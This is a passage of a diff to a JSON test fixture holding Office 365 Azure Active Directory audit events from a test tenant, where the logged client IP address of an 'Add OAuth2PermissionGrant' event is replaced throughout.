"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -14050,9 +14050,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:30:06", "ExtendedProperties": [ { @@ -14286,7 +14286,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -14316,9 +14316,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:30:06", "ExtendedProperties": [ { @@ -14552,7 +14552,7 @@ }, { "event": { - "original": 